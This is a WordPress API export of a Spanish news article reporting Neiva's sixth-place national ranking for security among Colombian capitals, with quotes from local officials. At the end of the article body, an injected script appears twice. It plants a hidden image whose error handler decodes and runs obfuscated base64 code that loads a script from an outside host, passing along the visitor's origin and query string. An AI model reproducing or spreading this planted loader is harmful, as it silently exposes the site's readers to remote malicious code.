{"id":12897,"date":"2025-07-07T12:04:43","date_gmt":"2025-07-07T17:04:43","guid":{"rendered":"https:\/\/radiosurcolombiana.com\/wp\/?p=12897"},"modified":"2025-08-18T11:37:31","modified_gmt":"2025-08-18T16:37:31","slug":"neiva-entre-las-ciudades-mas-seguras-del-pais-gracias-a-estrategia-integral-de-seguridad","status":"publish","type":"post","link":"https:\/\/radiosurcolombiana.com\/wp\/neiva-entre-las-ciudades-mas-seguras-del-pais-gracias-a-estrategia-integral-de-seguridad\/","title":{"rendered":"Neiva, entre las ciudades m\u00e1s seguras del pa\u00eds gracias a estrategia integral de seguridad"},"content":{"rendered":"\n<p>Neiva ocupa el sexto lugar en el ranking nacional de ciudades capitales con mejores indicadores de seguridad, tras la articulaci\u00f3n entre la Gobernaci\u00f3n del Huila, la Alcald\u00eda y la Fuerza P\u00fablica.<\/p>\n\n\n\n<p>Neiva ha logrado posicionarse como una de las ciudades m\u00e1s seguras del pa\u00eds, gracias a la reducci\u00f3n significativa de delitos de alto impacto.<\/p>\n\n\n\n<p>Esta mejora ha sido posible gracias al trabajo articulado entre la Gobernaci\u00f3n del Huila, la Alcald\u00eda de Neiva y la Fuerza P\u00fablica, a trav\u00e9s de planes integrales de seguridad implementados tanto en la zona urbana como en la rural, y mediante la asignaci\u00f3n de recursos que han fortalecido la capacidad operativa de las autoridades.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"12898\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-3-576x1024.jpeg\" alt=\"\" class=\"wp-image-12898\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-3-576x1024.jpeg 576w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-3-169x300.jpeg 169w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-3-768x1365.jpeg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-3-864x1536.jpeg 864w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-3-1152x2048.jpeg 1152w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-3-scaled.jpeg 1440w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"12901\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-2-576x1024.jpeg\" alt=\"\" class=\"wp-image-12901\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-2-576x1024.jpeg 576w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-2-169x300.jpeg 169w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-2-768x1365.jpeg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-2-864x1536.jpeg 864w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-2-1152x2048.jpeg 1152w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-2-scaled.jpeg 1440w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"12900\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-576x1024.jpeg\" alt=\"\" class=\"wp-image-12900\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-576x1024.jpeg 576w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-169x300.jpeg 169w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-768x1365.jpeg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-864x1536.jpeg 864w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-1152x2048.jpeg 1152w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-scaled.jpeg 1440w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"12899\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-3-576x1024.jpeg\" alt=\"\" class=\"wp-image-12899\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-3-576x1024.jpeg 576w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-3-169x300.jpeg 169w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-3-768x1365.jpeg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-3-864x1536.jpeg 864w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-3-1152x2048.jpeg 1152w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-3-scaled.jpeg 1440w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u201cLo ha dicho el se\u00f1or Gobernador, es una realidad. En el \u00faltimo Consejo de Seguridad Unificado que tuvimos aqu\u00ed en la Gobernaci\u00f3n del Huila hace muy pocos d\u00edas, con presencia del General Warlington Waldron, quien actualmente es el Director Nacional del Servicio de Polic\u00eda, y luego de la evaluaci\u00f3n estad\u00edstica con la ciencia de datos que hace la Polic\u00eda Nacional sobre las ciudades capitales en Colombia \u201432 en total\u2014, Neiva se ubic\u00f3 en el sexto puesto en este ranking nacional\u201d, afirm\u00f3 Jos\u00e9 Ferney Ducuara Castro, secretario de Gobierno de Neiva.<\/p>\n\n\n\n<p>Por su parte, el gobernador del Huila, Rodrigo Villalba Mosquera, asegur\u00f3 que este logro ha sido posible gracias al trabajo articulado entre el alcalde de Neiva, Germ\u00e1n Casagua Bonilla.<\/p>\n\n\n\n<p>\u201cPor su puesto que nos anima tanto a las autoridades de Neiva como del departamento y la Fuerza P\u00fablica para seguir trabajando en enfrentar ese flagelo que subsiste en todo el pa\u00eds; y Neiva y el Huila no es la excepci\u00f3n como es el tema de inseguridad\u201d, manifest\u00f3 el gobernador.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"12905\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-12905\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-1-1024x768.jpeg 1024w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-1-300x225.jpeg 300w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-1-768x576.jpeg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-1-1536x1152.jpeg 1536w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.28-AM-1-2048x1536.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"12904\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-12904\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-2-1024x768.jpeg 1024w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-2-300x225.jpeg 300w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-2-768x576.jpeg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-2-1536x1152.jpeg 1536w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-2-2048x1536.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"954\" data-id=\"12902\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1-1024x954.jpeg\" alt=\"\" class=\"wp-image-12902\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1-1024x954.jpeg 1024w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1-300x279.jpeg 300w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1-768x715.jpeg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1-1536x1430.jpeg 1536w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"12903\" src=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1024x576.jpeg\" alt=\"\" class=\"wp-image-12903\" srcset=\"https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1024x576.jpeg 1024w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-300x169.jpeg 300w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-768x432.jpeg 768w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-1536x864.jpeg 1536w, https:\/\/radiosurcolombiana.com\/wp\/wp-content\/uploads\/2025\/07\/WhatsApp-Image-2025-07-07-at-11.52.27-AM-2048x1152.jpeg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Precis\u00f3 Ducuara que los indicadores \u201cnos motiva a seguir trabajando en sinergia interinstitucional entre Gobernaci\u00f3n, Alcald\u00eda, Polic\u00eda Metropolitana de Neiva, Ej\u00e9rcito Nacional, Fiscal\u00eda y dem\u00e1s organismos que hacen presencia en nuestro territorio\u201d.<\/p>\n\n\n\n<p>El reconocimiento nacional que hoy recibe Neiva refleja el esfuerzo conjunto y sostenido de las autoridades. Si bien, seg\u00fan el secretario de Gobierno, estos resultados no significan la desaparici\u00f3n total de los problemas de seguridad, s\u00ed representan un avance tangible y alentador hacia una ciudad m\u00e1s segura.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Neiva ocupa el sexto lugar en el ranking nacional de ciudades capitales con mejores indicadores de seguridad, tras la articulaci\u00f3n entre la Gobernaci\u00f3n del Huila, la Alcald\u00eda y la Fuerza&hellip; <\/p>\n","protected":false},"author":2,"featured_media":12902,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_joinchat":[],"footnotes":""},"categories":[41,18],"tags":[],"class_list":["post-12897","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-judicial","category-ciudad"],"_links":{"self":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/12897","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/comments?post=12897"}],"version-history":[{"count":3,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/12897\/revisions"}],"predecessor-version":[{"id":13288,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/posts\/12897\/revisions\/13288"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/media\/12902"}],"wp:attachment":[{"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/media?parent=12897"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/categories?post=12897"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiosurcolombiana.com\/wp\/wp-json\/wp\/v2\/tags?post=12897"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}